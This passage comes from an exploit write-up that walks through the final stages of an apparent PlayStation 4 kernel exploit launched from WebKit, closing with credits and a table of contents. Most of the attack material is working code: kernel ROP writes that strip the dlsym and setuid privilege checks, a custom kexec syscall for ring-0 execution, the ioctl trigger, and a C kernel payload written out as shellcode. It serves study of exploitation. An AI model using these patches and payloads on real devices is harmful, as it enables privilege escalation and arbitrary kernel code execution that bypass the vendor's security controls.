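These bytes match the start of kernel_syscall_patch2 when it is laid out in little-endian order, with the two 0x90 (nop) bytes that follow padding the space left over from the original cmp instruction.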

Allow sys_dynlib_dlsym from Anywhere

Our payloads are going to need to be able to resolve userland symbols, so these patches are essential for running payloads.

The first patch patches a check against a member that Sony added to the proc structure that defines if a process can call sys_dynlib_dlsym().

seg000:FFFFFFFFA1652ACF                 mov     rdi, [rbx+8]
seg000:FFFFFFFFA1652AD3                 call    sub_FFFFFFFFA15E6930
seg000:FFFFFFFFA1652AD8                 cmp     eax, 4000000h
seg000:FFFFFFFFA1652ADD                 jb      loc_FFFFFFFFA1652D8B

The second patch forces a function that checks if the process should have dynamic resolving to always return 0.

seg000:FFFFFFFFA15EADA0 sub_FFFFFFFFA15EADA0 proc near          ; CODE XREF: sys_dynlib_dlsym+F9↓p
seg000:FFFFFFFFA15EADA0                                         ; sys_dynlib_get_info+1FC↓p ...
seg000:FFFFFFFFA15EADA0                 mov     rax, gs:0
seg000:FFFFFFFFA15EADA9                 mov     rax, [rax+8]
seg000:FFFFFFFFA15EADAD                 mov     rcx, [rax+340h]
seg000:FFFFFFFFA15EADB4                 mov     eax, 1
seg000:FFFFFFFFA15EADB9                 test    rcx, rcx
seg000:FFFFFFFFA15EADBC                 jz      short locret_FFFFFFFFA15EADCA
seg000:FFFFFFFFA15EADBE                 test    [rcx+0F0h], edi
seg000:FFFFFFFFA15EADC4                 setnz   al
seg000:FFFFFFFFA15EADC7                 movzx   eax, al
seg000:FFFFFFFFA15EADCA
seg000:FFFFFFFFA15EADCA locret_FFFFFFFFA15EADCA:                ; CODE XREF: sub_FFFFFFFFA15EADA0+1C↑j
seg000:FFFFFFFFA15EADCA                 retn
seg000:FFFFFFFFA15EADCA sub_FFFFFFFFA15EADA0 endp

This is patched to simply:

seg000:FFFFFFFFA15EADA0                 xor eax, eax
seg000:FFFFFFFFA15EADA2                 ret
[nop x5]

Patching both of these checks should allow any process, even WebKit, to dynamically resolve symbols.

// Patch sys_dynlib_dlsym: Allow from anywhere
var kernel_dlsym_patch1 = new int64(0x000000E9, 0x8B489000);
var kernel_dlsym_patch2 = new int64(0x90C3C031, 0x90909090);
kchain.write64(kernelBase.add32(0x14AADD), kernel_dlsym_patch1);
kchain.write64(kernelBase.add32(0xE2DA0), kernel_dlsym_patch2);

Install kexec system call

Our goal with this patch is to create our own syscall under syscall #11. This syscall will allow us to execute arbitrary code in supervisor mode (ring0). It will only have two arguments, the first being a pointer to the function we want to execute. The second argument will be uap to pass arguments to the function. This code creates an entry in the sysent table.

// Add custom sys_exec() call to execute arbitrary code as kernel
var kernel_exec_param = new int64(0, 1);
kchain.write64(kernelBase.add32(0xF179A0), 0x02);
kchain.write64(kernelBase.add32(0xF179A8), kernelBase.add32(0x65750));
kchain.write64(kernelBase.add32(0xF179C8), kernel_exec_param);

Kernel Exploit Check

We don't want the kernel exploit to run more than once, as once we install our custom kexec() system call we don't need to. To do this, I decided to patch the privilege check out of the sys_setuid() system call, so we will know if the kernel has been patched if we can successfully call setuid(0) from WebKit.

seg000:FFFFFFFFA158DBB0                 call    priv_check_cred

To easily bypass this check, I decided to just change it to move 0 into the rax register (mov eax, 0 zero-extends into rax). The replacement instruction happens to be exactly the same size as the call.

seg000:FFFFFFFFA158DBB0                 mov eax, 0

As you can guess, this also doubles as a partial privilege escalation.

// Add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
var kexploit_check_patch = new int64(0x000000B8, 0x85C38900);
kchain.write64(kernelBase.add32(0x85BB0), kexploit_check_patch);
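
On the userland side, the check could look roughly like the sketch below. This is only an illustration: `kernelAlreadyPatched` is a hypothetical name, the mock objects stand in for the exploit's `p` primitive so the snippet runs on its own, and it assumes `p.syscall` returns a value that compares equal to 0 on success (the real return type may need a different comparison).

```javascript
// Hypothetical check: setuid(0) only succeeds from WebKit once the
// privilege check in sys_setuid() has been patched out.
// Assumption: p.syscall returns something comparable to 0 on success.
function kernelAlreadyPatched(p) {
  return p.syscall("sys_setuid", 0) == 0;
}

// Mock primitives for illustration only; the failure value -1 is assumed.
const unpatchedMock = { syscall: (name, uid) => -1 };
const patchedMock = { syscall: (name, uid) => 0 };

const firstRun = kernelAlreadyPatched(unpatchedMock);
const laterRun = kernelAlreadyPatched(patchedMock);

console.log("first run, already patched?", firstRun);
console.log("later run, already patched?", laterRun);
```

The kernel exploit would then only be launched when the check reports that the kernel is not yet patched.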

Exit to Userland

Finally, we want to exit our kROP chain to prevent crashing the kernel. To do this, we need to restore RSP to its value before the stack pivot. As stated earlier, we have a stack leak at 0x20 in the leak buffer, and it's 0x3C0 off from a good RSP value to return to. These instructions apply the RSP fix by loading the stack leak + 0x3C0 into the RSP register, so when the final gadget returns, execution resumes on the original stack.

// Exit kernel ROP chain
kchain.push(window.gadgets["pop rax"]);
kchain.push(stackLeakFix.add32(0x3C0));
kchain.push(window.gadgets["pop rcx"]);
kchain.push(window.gadgets["pop rsp"]);
kchain.push(window.gadgets["push rax; jmp rcx"]);
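
The order of the gadgets can look odd at first, so here is a toy simulation of the chain. It is a simplified model, not the real ROP framework: gadgets are represented by their names, the value written by `push rax` is kept in a small scratch array instead of real stack memory, and the leaked stack address is a made-up example value.

```javascript
// Toy model of the exit chain; gadget names are used in place of addresses.
function simulateExitChain(chain) {
  const regs = { rax: null, rcx: null, rsp: null };
  const pushed = [];      // models the slot written by "push rax"
  let sp = 0;             // index of the next chain entry to consume
  let ip = chain[sp++];   // the pivot's ret fetches the first gadget

  while (true) {
    switch (ip) {
      case "pop rax":     // pop rax; ret
        regs.rax = chain[sp++];
        ip = chain[sp++];
        break;
      case "pop rcx":     // pop rcx; ret
        regs.rcx = chain[sp++];
        ip = chain[sp++];
        break;
      case "push rax; jmp rcx":
        pushed.push(regs.rax);
        ip = regs.rcx;
        break;
      case "pop rsp":     // pop rsp; ret (execution leaves the chain here)
        regs.rsp = pushed.pop();
        return regs;
      default:
        throw new Error("unknown gadget: " + String(ip));
    }
  }
}

// Hypothetical leaked stack address, for illustration only.
const exampleStackLeak = 0xffffff8000001000n;
const exitRegs = simulateExitChain([
  "pop rax", exampleStackLeak + 0x3c0n,
  "pop rcx", "pop rsp",
  "push rax; jmp rcx",
]);

console.log("rsp = 0x" + exitRegs.rsp.toString(16));
```

In this model, rax carries the target stack pointer, rcx carries the address of the `pop rsp` gadget, and the final gadget pushes the former and jumps to the latter, which loads the value into RSP.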

Stage 6 - Trigger

Now we need to trigger the exploit by calling the ioctl() system call on our object. The second parameter (cmd) does not matter because the handler will never be reached as we have overwritten it with our stack pivot gadget.

p.syscall('sys_ioctl', p.read8(targetDevFd), 0x81200000, obj_cdev_priv);

Stage 7 - Stabilizing the Object

Finally, we need to ensure the object doesn't get corrupted. The cdev_priv object is global, meaning other processes will go to use it at some point. Since we free()'d its backing memory, some other allocation could steal this pointer and overwrite our faked object, causing unpredictable crashes. To avoid this, we can call malloc() in the kernel a bunch of times to try to obtain this pointer. Essentially, we are performing a second heap spray, except that if we get the address we want, we keep the allocation.

Since the kernel payload needs to retrieve the address of the object to write to, we will store it at an absolute address, 0xDEAD0000. We will also use this mapping to execute our payload.

var baseAddressExecute = new int64(0xDEAD0000, 0);
var exploitExecuteAddress = p.syscall("sys_mmap", baseAddressExecute, 0x10000, 7, 0x1000, -1, 0);

var executeSegment = new memory(p, exploitExecuteAddress);

var objBaseStore = executeSegment.allocate(0x8);
var shellcode = executeSegment.allocate(0x200);

p.write8(objBaseStore, objBase);
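
The payload later reads the object address straight from 0xDEAD0000, which only works if the first allocation from the segment lands at its base. The sketch below shows one way such a helper could behave, assuming a simple bump allocator. `BumpRegion` is a hypothetical stand-in for the exploit's `memory` helper and uses BigInt addresses rather than the exploit's int64 type.

```javascript
// Hypothetical stand-in for the exploit's `memory` helper:
// hands out consecutive chunks starting at the base of a mapping.
class BumpRegion {
  constructor(base) {
    this.base = base;  // start of the mapped region
    this.used = 0n;    // bytes handed out so far
  }

  allocate(size) {
    const address = this.base + this.used;
    this.used += BigInt(size);
    return address;
  }
}

const region = new BumpRegion(0xdead0000n);
const objBaseStoreAddr = region.allocate(0x8);   // 8-byte slot for the object pointer
const shellcodeAddr = region.allocate(0x200);    // room for the payload

console.log("objBaseStore at 0x" + objBaseStoreAddr.toString(16));
console.log("shellcode at 0x" + shellcodeAddr.toString(16));
```

If the real helper works this way, the stored pointer sits at the very start of the mapping and the shellcode begins immediately after it.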

We will also apply a few of our other patches to the object, such as restoring the object's name and original si_devsw pointer.

src

int main(void)
{
	int i;
	void *addr;
	uint8_t *ptrKernel;

	int (*printf)(const char *fmt, ...) 						= NULL;
	void *(*malloc)(unsigned long size, void *type, int flags) 	= NULL;
	void (*free)(void *addr, void *type) 						= NULL;

	// Get kbase and resolve kernel symbols
	ptrKernel = (uint8_t *)(rdmsr(0xc0000082) - KERN_XFAST_SYSCALL);
	malloc 	= (void *)&ptrKernel[KERN_MALLOC];
	free 	= (void *)&ptrKernel[KERN_FREE];
	printf 	= (void *)&ptrKernel[KERN_PRINTF];

	uint8_t *objBase = (uint8_t *)(*(uint64_t *)(0xDEAD0000));

	// Fix stuff in object that's corrupted by exploit
	*(uint64_t *)(objBase + 0x0E0) = 0x7773706964;
	*(uint64_t *)(objBase + 0x0F0) = 0;
	*(uint64_t *)(objBase + 0x0F8) = 0;

	// Malloc so object doesn't get smashed
	for (i = 0; i < 512; i++)
	{
		addr = malloc(0x180, &ptrKernel[0x133F680], 0x02);

		printf("Alloc: 0x%lx\n", addr);

		if (addr == (void *)objBase)
			break;

		free(addr, &ptrKernel[0x133F680]);
	}

	printf("Object Dump 0x%lx\n", objBase);

	for (i = 0; i < 0x180; i += 8)
		printf("<Debug> Object + 0x%03x: 0x%lx\n", i, *(uint64_t *)(objBase + i));

	// EE :)

	return 0;
}
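
The constant written to objBase + 0x0E0 in the payload is the object's name packed into a 64-bit value. As a quick illustration, this sketch decodes it byte by byte in little-endian order; `qwordToAscii` is a hypothetical helper.

```javascript
// Hypothetical helper: read a 64-bit value as a little-endian ASCII string,
// stopping once the remaining high bytes are all zero.
function qwordToAscii(value) {
  let text = "";
  for (let v = value; v > 0n; v >>= 8n) {
    text += String.fromCharCode(Number(v & 0xffn));
  }
  return text;
}

const restoredName = qwordToAscii(0x7773706964n);
console.log(restoredName);
```

This prints dipsw, the name being restored; the remaining high bytes of the qword are zero and act as the string terminator.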

This payload was then compiled and converted into shellcode which is executed via our kexec() system call we installed earlier.

var stage7 = new rop(p, undefined);

p.write4(shellcode.add32(0x00000000), 0x00000be9);
p.write4(shellcode.add32(0x00000004), 0x90909000);
p.write4(shellcode.add32(0x00000008), 0x90909090);
// ... [omitted for readability]

stage7.push(window.gadgets["pop rax"]);
stage7.push(11);
stage7.push(window.gadgets["pop rdi"]);
stage7.push(shellcode);
stage7.push(libkernel.add32(0x29CA)); // "syscall" gadget

stage7.run();
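
The long run of p.write4() calls does not have to be written by hand. The following sketch shows one way to generate them from the compiled payload bytes, packing four bytes at a time into little-endian dwords. `packDwords` and `emitWrites` are hypothetical helpers, and padding a trailing partial dword with nop (0x90) is an assumption, not something the source specifies.

```javascript
// Hypothetical helper: pack raw bytes into unsigned little-endian dwords.
function packDwords(bytes) {
  const dwords = [];
  for (let i = 0; i < bytes.length; i += 4) {
    let dword = 0;
    for (let j = 0; j < 4; j++) {
      // Assumption: pad a trailing partial dword with nop (0x90).
      const byte = i + j < bytes.length ? bytes[i + j] : 0x90;
      dword |= byte << (8 * j);
    }
    dwords.push(dword >>> 0); // force an unsigned 32-bit result
  }
  return dwords;
}

// Hypothetical helper: format a dword as 8 hex digits.
function hex32(value) {
  return "0x" + value.toString(16).padStart(8, "0");
}

// Emit one p.write4() line per dword, in the style used above.
function emitWrites(bytes) {
  return packDwords(bytes).map(
    (dword, index) =>
      "p.write4(shellcode.add32(" + hex32(index * 4) + "), " + hex32(dword) + ");"
  );
}

// The first 12 payload bytes, recovered from the three writes shown above.
const payloadPrefix = [0xe9, 0x0b, 0x00, 0x00, 0x00, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90];
const writeLines = emitWrites(payloadPrefix);

console.log(writeLines.join("\n"));
```

Run on those 12 bytes, the sketch reproduces the three writes listed above.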

Conclusion

This is quite an interesting exploit, though it did require a lot of guessing and would have been a lot more fun to work with had I had a proper kernel debugger. Getting a working object can be a long and grueling process, depending on the leak you're using. Overall this exploit is incredibly stable; in fact, I ran it over 30 times and neither WebKit nor the kernel crashed once. I learned a lot from implementing it, and I hope this write-up helps others like myself who are interested in exploitation learn a few things too.

Special Thanks

CTurt
Flatz
qwertyoruiopz
other anonymous contributors

Mistakes?

See any issues I glanced over? Open an issue or send me a tweet and let me know :)

Table of contents generated with markdown-toc.

Table of Contents

Introduction

Changes since 1.76

Stage 1 - Information Disclosure

Helpful information

Vector sys_thr_get_ucontext

Implementation

Thread Creation

Thread Suspension

Setup Function

Leak!

kASLR Defeat

Object Leak

Stack Pivot Fix

Putting it all together

Stage 2 - Arbitrary Free

Vector 1 - sys_namedobj_create

Vector 2 - sys_mdbg_service

Vector 3 - sys_namedobj_delete

Implementation

Creating a named object

Writing a pointer to free

Free!

Stage 3 - Heap Spray/Object Fake

Helpful information

Corrupting the object

The cdev object

si_name

si_devsw

The (rest of the) cdev_priv object

The cdevsw object

Target - d_ioctl

Spray

Stage 4 - Kernel Stack Pivot

Stage 5 - Building the Kernel ROP Chain

Disabling Kernel Write Protection

Allowing RWX Memory Mapping

Syscall Anywhere

Allow sys_dynlib_dlsym from Anywhere

Install kexec system call

Kernel Exploit Check

Exit to Userland

Stage 6 - Trigger

Stage 7 - Stabilizing the Object

Conclusion

Special Thanks

Mistakes?